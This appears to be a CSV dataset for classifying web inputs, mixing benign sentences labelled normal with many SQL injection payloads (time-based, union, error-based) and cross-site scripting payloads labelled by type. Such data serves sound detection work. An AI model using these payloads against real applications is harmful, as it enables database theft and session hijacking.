( 0x6d457153 ) ) #",2,SQLi,14685 +"-9891"" union all select 7489#",2,SQLi,20410 +<set onpointermove=alert(1)>XSS</set>,1,XSS,7503 +-4173' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 'jdwt' like 'jdwt,2,SQLi,21791 +Select post.,0,normal,24668 +"1"" where 7739 = 7739 and sleep ( 5 ) --",2,SQLi,12262 +"<em draggable=""true"" ondragleave=""alert(1)"">test</em>",1,XSS,1733 +"-8429' ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( 'bwih' like 'bwih",2,SQLi,13370 +"<datalist onclick=""alert(1)"">test</datalist>",1,XSS,3541 +<multicol onpointermove=alert(1)>XSS</multicol>,1,XSS,8454 +Insert your personal details.,0,normal,22694 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and 'gfpd' = 'gfpd",2,SQLi,12844 +"<svg onclick=""alert(1)"">test</svg>",1,XSS,2826 +1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'diyb' like 'diyb,2,SQLi,17005 +"1"" ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,12126 +"<ruby onbeforecut=""alert(1)"" contenteditable>test</ruby>",1,XSS,8147 +-2573 ) ) order by 1#,2,SQLi,12515 +"select * from users where id = 1 <@&@ union select 1,version ( ) -- 1",2,SQLi,11332 +Select your dream house.,0,normal,24237 +<u id=x tabindex=1 onactivate=alert(1)></u>,1,XSS,2588 +"1 ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 7984 = 7984",2,SQLi,14638 +"1 ) as bfuy where 3879 = 3879 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,13111 +"<div style=""position:absolute;top:0;left:0;width:100%;height:100%",1,XSS,9038 +<time onpointerover=alert(1)>XSS</time>,1,XSS,6957 +"<progress draggable=""true"" ondragenter=""alert(1)"">test</progress>",1,XSS,3923 +"Find out how to prevent slow punctures, select tires and tubes of the right size and pack a spare inner tube for emergencies.",0,normal,26150 +Select your dream team.,0,normal,24300 +-9562' or 8571 = 8571--,2,SQLi,20039 +"select * from users where id = '1' *1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,11966 +"<style>@keyframes slidein {}</style><dir style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></dir>",1,XSS,3989 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#",2,SQLi,10698 +"Select both objects Specify rollover settings To test the behavior of the rollover button, hover your mouse over the Preview window.",0,normal,25605 +"<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//[""'`-->]]>]</div>",1,XSS,9110 +"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337""=""1337",2,SQLi,11124 +"1"" where 5796 = 5796 and sleep ( 5 ) #",2,SQLi,14899 +&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;,1,XSS,1347 +-5217 where 3620 = 3620 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,20497 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13",2,SQLi,10319 +"1' or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,22033 +1 ) order by 1--,2,SQLi,20375 +The animation allows the user to select from a number of fluorescence photomicrographs and vary the amount of astigmatism in the optical system.,0,normal,25449 +"<div draggable=""true"" contenteditable>drag me</div><nextid ondragover=alert(1) contenteditable>drop here</nextid>",1,XSS,5255 +"1 ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( 8189 = 8189",2,SQLi,15622 +"<keygen onkeypress=""alert(1)"" contenteditable>test</keygen>",1,XSS,2546 +"1' where 1836 = 1836 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12814 +select ( case when ( 8601 = 1220 ) then 8601 else 8601* ( select 8601 from mysql.db ) end ) #,2,SQLi,21460 +&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;,1,XSS,1350 +Where's the nearest park?,0,normal,23460 +"To publish your own plan, the very first time you need to select the menu option jabber... Plans... Init my plan.",0,normal,25227 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></datalist>",1,XSS,8214 +"-9558"" where 7497 = 7497 or ( 2539 = 6484 ) *6484--",2,SQLi,12954 +1 ) where 8041 = 8041,2,SQLi,16778 +"1' and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'cdgm' like 'cdgm",2,SQLi,14801 +"1%' ) union all select null,null,null,null,null,null,null,null#",2,SQLi,15751 +"-9606%"" ) ) ) union all select 8572,8572,8572,8572,8572,8572,8572,8572,8572--",2,SQLi,16753 +"<div id=d><x xmlns=""><iframe onload=javascript:alert(1)""></div> <script>d.innerHTML=d.innerHTML</script>",1,XSS,607 +"<style>:target {color: red;}</style><xmp id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></xmp>",1,XSS,6746 +The organization provides an up-to-the minute financial comparison service allowing customers to select from all suitable products from all relevant providers.,0,normal,25366 +"1"" or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,13176 +Select your decide.,0,normal,24967 +<svg><option onload=alert(1)></option>,1,XSS,2091 +select * from users where id = 1 + ( \. ) or 1 = 1 -- 1,2,SQLi,11525 +"<;IMG DYNSRC="";javascript:alert(';XSS';);"";>;",1,XSS,1531 +"1"" ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ""gcyp"" like ""gcyp",2,SQLi,17490 +"-5245' or elt ( 1032 = 1032,3623 ) and 'qfvo' = 'qfvo",2,SQLi,18869 +Lowe's: Up to 30% off select patio furniture and outdoor decor,0,normal,25860 +"-2790' ) as xhct where 5756 = 5756 union all select 5756,5756#",2,SQLi,19637 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--",2,SQLi,10370 +select,0,normal,26570 +"1"" where 8016 = 8016",2,SQLi,13044 +"<aside onmousemove=""alert(1)"">test</aside>",1,XSS,8230 +"-2384'|| ( select 'vhcp' from dual where 1266 = 1266 union all select 1266,1266,1266,1266--",2,SQLi,17689 +"1"" ) ) as uqkn where 4642 = 4642 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,21650 +"1 ) as ghew where 6441 = 6441 union all select null,null--",2,SQLi,12402 +<datalist onpointerup=alert(1)>XSS</datalist>,1,XSS,2843 +"<LINK REL=""stylesheet"" HREF=""javascript:alert('');"">",1,XSS,5546 +"1 ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,18106 +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>",1,XSS,551 +"-8238' ) ) union all select 9797,9797,9797,9797,9797,9797,9797,9797#",2,SQLi,13967 +"<IMG SRC=x onmousewheel=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1159 +"<a href=""javas\x0Bcript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,419 +"<details draggable=""true"" ondragend=""alert(1)"">test</details>",1,XSS,2499 +"Select, don't hesitate.",0,normal,24757 +<hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus>,1,XSS,4047 +"1"" where 3692 = 3692 union all select null,null--",2,SQLi,15142 +"<base onclick=""alert(1)"">test</base>",1,XSS,3406 +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>',1,XSS,822 +Select your drift.,0,normal,24990 +"-3566' where 3641 = 3641 union all select 3641,3641,3641,3641,3641#",2,SQLi,15243 +"<basefont oncut=""alert(1)"" contenteditable>test</basefont>",1,XSS,2208 +\'-alert(1)//,1,XSS,9316 +"1 ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 3023 = 3023",2,SQLi,21836 +1' ) ) as dqby where 9256 = 9256,2,SQLi,15559 +<address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus>,1,XSS,6101 +"<style>:target {transform: rotate(180deg);}</style><slot id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></slot>",1,XSS,2230 +"1 where 1776 = 1776 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,13489 +"<form><a href=""javascript:\u0061lert(1)"">X",1,XSS,313 +"<dd onkeydown=""alert(1)"" contenteditable>test</dd>",1,XSS,3781 +"1"" ) as assu where 7521 = 7521 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,13353 +"; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --",2,SQLi,11057 +"1'|| ( select 'votg' where 5105 = 5105 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16096 +"<style>@keyframes slidein {}</style><small style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></small>",1,XSS,5722 +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E,1,XSS,432 +"1' ) as pfwt where 8448 = 8448 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15077 +"<dl onbeforepaste=""alert(1)"" contenteditable>test</dl>",1,XSS,3510 +"1' ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,13875 +She deleted the old files.,0,normal,22966 +"end and ( ""nuix"" like ""nuix",2,SQLi,13433 +"&lt;XSS STYLE=\""xss&#58;expression(alert('XSS'))\""&gt;",1,XSS,961 +"1'|| ( select 'eils' where 8308 = 8308 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,21927 +"<basefont onpaste=""alert(1)"" contenteditable>test</basefont>",1,XSS,2767 +<caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus>,1,XSS,6604 +"1"" where 9618 = 9618 and ( 3020 = 3020 ) *6703--",2,SQLi,14854 +"1' and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,21745 +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>,1,XSS,1457 +"( select ( case when ( 1343 = 1343 ) then ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) else 1343 end ) from dual )",2,SQLi,21162 +<svg><applet onload=alert(1)></applet>,1,XSS,7034 +"<object data=""http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"">",1,XSS,839 +"<li onmousedown=""alert(1)"">test</li>",1,XSS,1871 +<x oncut=alert()>x,1,XSS,9536 +Select your favorite song.,0,normal,22556 +1 ) ) as xoch where 8765 = 8765 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,18150 +"<noembed oncopy=""alert(1)"" contenteditable>test</noembed>",1,XSS,8159 +"1' ) ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,14609 +&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;,1,XSS,927 +<wbr onpointerleave=alert(1)>XSS</wbr>,1,XSS,7668 +"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 'ahjo' = 'ahjo",2,SQLi,13912 +AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i,2,SQLi,10982 +"<FRAMESET><FRAME SRC=""javascript:document.vulnerable=true;""></frameset>",1,XSS,1442 +"1' where 6953 = 6953 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,19081 +"-3975' ) or make_set ( 1943 = 3499,3499 ) and ( 'dawb' = 'dawb",2,SQLi,22132 +"><img src=x onerror=javascript:alert(`1`)> +><img src=x onerror=javascript:alert(('1'))>",1,XSS,1216 +"1"" where 2394 = 2394 and 8831 = 8333--",2,SQLi,21319 +"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,12247 +<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins>,1,XSS,4611 +"<cite onclick=""alert(1)"">test</cite>",1,XSS,3691 +"<var onbeforecut=""alert(1)"" contenteditable>test</var>",1,XSS,7325 +Levi's: Save up to 30% on select styles until November 203.,0,normal,25866 +"select * from users where id = '1' union select $ .,@@VERSION -- 1'",2,SQLi,11548 +"1"" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ""dsae"" = ""dsae",2,SQLi,12866 +"<u onmouseout=""alert(1)"">test</u>",1,XSS,4195 +"1"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""vcjt"" like ""vcjt",2,SQLi,13034 +"1' ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,12627 +ORDER BY 19#,2,SQLi,10186 +"1"" where 8732 = 8732",2,SQLi,20255 +"1"" and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ""hcjz"" like ""hcjz",2,SQLi,17982 +<small onpointerdown=alert(1)>XSS</small>,1,XSS,2484 +"make_set ( 2672 = 2672,5440 )",2,SQLi,14933 +-5708 where 3134 = 3134 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,21266 +<svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus>,1,XSS,4635 +Update the file.,0,normal,22841 +"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +<base href=//0> +<script/src=data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)",1,XSS,9649 +"1%' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( '%' = '",2,SQLi,14586 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></thead>",1,XSS,1973 +-6327' ) ) union all select 2685--,2,SQLi,19345 +if ( 4907 = 9581 ) select 4907 else drop function apqw--,2,SQLi,21190 +"1 ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 7200 = 7200",2,SQLi,15826 +Delete emails.,0,normal,23035 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",2,SQLi,10324 +"-9606 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) # iuij",2,SQLi,20243 +<dd onpointerdown=alert(1)>XSS</dd>,1,XSS,5771 +<acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus>,1,XSS,6553 +"1 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,19080 +"Now, we may select any definite quantity of work we please as our unit, as, for example, the work done in lifting a pound a foot high from the sea-level in the latitude of London, which is the unit of work generally adopted by British engineers, and is called the ""foot-pound.""",0,normal,25814 +"a=""get"";",1,XSS,6247 +"1"" where 1051 = 1051 union all select null--",2,SQLi,12970 +"<figure onmousemove=""alert(1)"">test</figure>",1,XSS,8333 +1' ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( 'wuux' = 'wuux,2,SQLi,14021 +"<div id=""118""><div draggable=""true"" ondragstart=""event.dataTransfer.setData('text/plain','malicious code');""><h1>Drop me</h1></div>",1,XSS,9053 +<svg><rb onload=alert(1)></rb>,1,XSS,7142 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16",2,SQLi,10322 +Select navigate.,0,normal,24620 +"1"" ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ""qkds"" like ""qkds",2,SQLi,13089 +<nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus>,1,XSS,3434 +Where's the cabin?,0,normal,23520 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#",2,SQLi,10437 +ORDER BY 14--,2,SQLi,10150 +"1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and 'cotv' like 'cotv",2,SQLi,20795 +"<big onmouseenter=""alert(1)"">test</big>",1,XSS,1889 +"<textarea draggable=""true"" ondragenter=""alert(1)"">test</textarea>",1,XSS,2646 +"<div draggable=""true"" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong>",1,XSS,5002 +Select a topic I have a smelly green discharge I have small spots on my penis Was the condom safe enough?,0,normal,25618 +<x onmousedown=alert(1)>click this!,1,XSS,9297 +1 ) where 7729 = 7729,2,SQLi,14725 +Please select one option.,0,normal,24261 +"waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,19280 +"-2246"" ) ) union all select 4613,4613,4613,4613,4613,4613#",2,SQLi,14005 +"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--",2,SQLi,10862 +"1'|| ( select 'mzhj' where 9677 = 9677 union all select null,null,null--",2,SQLi,20598 +<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus>,1,XSS,8320 +"select count ( * ) from generate_series ( 1,5000000 ) and ( ( 'jloi' = 'jloi",2,SQLi,22398 +"1', ( select ( case when ( 7711 = 7711 ) then 1 else 7711* ( select 7711 from information_schema.character_sets ) end ) )",2,SQLi,19630 +1 ) as ztrb where 1052 = 1052 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,20434 +Let's explore where the river flows into.,0,normal,23787 +"But the two others are almost (if now not quite) peculiar to the United States, viz, to select candidates for office and to procure places of emolument for party workers.",0,normal,26260 +( select ( case when ( 7018 = 7018 ) then 7018 else 7018* ( select 7018 from master..sysdatabases ) end ) ),2,SQLi,15719 +"<style>@keyframes slidein {}</style><kbd style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></kbd>",1,XSS,5817 +"<strong draggable=""true"" ondragenter=""alert(1)"">test</strong>",1,XSS,2747 +"select * from users where id = 1 or 1&@# = 1 union select 1,version ( ) -- 1",2,SQLi,11675 +1' in boolean mode ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) #,2,SQLi,16279 +"He became a fellow of Magdalen College, Oxford, in 1795, took orders in 1802, and was select university preacher in 1804.",0,normal,26081 +"-1503"" order by 1--",2,SQLi,22281 +"<template match=""/"">",1,XSS,9267 +<%78 onxxx=1,1,XSS,8972 +"You can select multiple photos on your iPhone at once using the ""Select"" command.",0,normal,25045 +"1"" ) ) as fapw where 4722 = 4722 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,21309 +"<figure draggable=""true"" ondrag=""alert(1)"">test</figure>",1,XSS,4022 +"1' ) where 4092 = 4092 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,19975 +"<nobr onbeforepaste=""alert(1)"" contenteditable>test</nobr>",1,XSS,2380 +"1' ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17868 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( '%' = '",2,SQLi,14332 +<label id=x tabindex=1 onfocus=alert(1)></label>,1,XSS,2221 +"))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337",2,SQLi,11178 +"If you want to select certain contacts to download, hover your cursor over their name and tick the box that appears; otherwise, in the left sidebar, select ""Export.""",0,normal,25998 +<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen>,1,XSS,3580 +1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'yaim' = 'yaim,2,SQLi,15674 +"<style>:target {color:red;}</style><strong id=x style=""transition:color 1s"" ontransitionend=alert(1)></strong>",1,XSS,2931 +"( select 2768 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 2768 = 2768,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,15809 +"The site has an option to select Portrait Photography, after which I was directed to select Professional Headshots (versus newborn and graduation portraits, for example).",0,normal,25339 +"javascript://--></title></style></textarea></script><svg ""//' onclick=alert()//",1,XSS,9496 +"1%"" ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,22039 +"1' ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'wsmq' = 'wsmq",2,SQLi,22232 +"<style>@keyframes slidein {}</style><spacer style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></spacer>",1,XSS,3188 +"<shadow onmousemove=""alert(1)"">test</shadow>",1,XSS,2975 +"1 ) where 1013 = 1013 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,14135 +"Select one color for the walls, and use the second color in the bedding, wall accents, chair upholstery and window coverings.",0,normal,25580 +"<audio onmouseleave=""alert(1)"">test</audio>",1,XSS,5113 +1 ) as mpnj where 5049 = 5049,2,SQLi,22152 +"1' ) as ccee where 8880 = 8880 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13102 +Filter rows where required.,0,normal,23216 +"<style>:target {transform: rotate(180deg);}</style><optgroup id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></optgroup>",1,XSS,8088 +Select your job.,0,normal,24821 +"1"" ) ) as lslk where 6729 = 6729 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,20687 +-5854 ) ) ) union all select 5645#,2,SQLi,18910 +<button onDataSetComplete=javascript:alert(1)>,1,XSS,9565 +1' where 3701 = 3701 and 2006 = 2006,2,SQLi,15312 +"1"" ) ) as rfgu where 4880 = 4880 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,13416 +"1"" ) ) as pafp where 6770 = 6770 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,20979 +-2181' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 'wyez' = 'wyez,2,SQLi,16267 +full,0,normal,23119 +select ( case when ( 8993 = 4660 ) then 1 else 8993* ( select 8993 from master..sysdatabases ) end ) --,2,SQLi,22224 +"1"" where 7380 = 7380 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13692 +"<div draggable=""true"" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc>",1,XSS,6664 +"1"" ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ""opgb"" like ""opgb",2,SQLi,14870 +"1"" ) ) union all select null,null,null,null,null,null#",2,SQLi,15844 +-7950' ) or 9323 = 9323#,2,SQLi,20258 +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>,1,XSS,312 +"-2131"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""wpsf"" like ""wpsf",2,SQLi,13208 +"<a href=""javascript%26colon;alert(1)"">click",1,XSS,9533 +Select a new hobby to explore.,0,normal,24002 +Where's the mountain cabin?,0,normal,23522 +Let's decide where to spend the summer vacation.,0,normal,23925 +"select * from users where id = 1 or "" ( ]"" or 1 = 1 -- 1",2,SQLi,11310 +1' rlike sleep ( 5 ),2,SQLi,20002 +<colgroup onpointerup=alert(1)>XSS</colgroup>,1,XSS,2268 +<element id=x tabindex=1 onactivate=alert(1)></element>,1,XSS,7753 +"1' ) ) ) and make_set ( 6094 = 2929,2929 ) and ( ( ( 'gkyo' = 'gkyo",2,SQLi,16558 +"<time onmousemove=""alert(1)"">test</time>",1,XSS,5827 +-2039' ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,22026 +"<style>@keyframes slidein {}</style><nextid style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nextid>",1,XSS,7335 +admin' --,2,SQLi,9865 +"-1830"" ) ) as bptv where 4805 = 4805 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,15556 +1'+ ( select 'vjoj' where 5348 = 5348,2,SQLi,15828 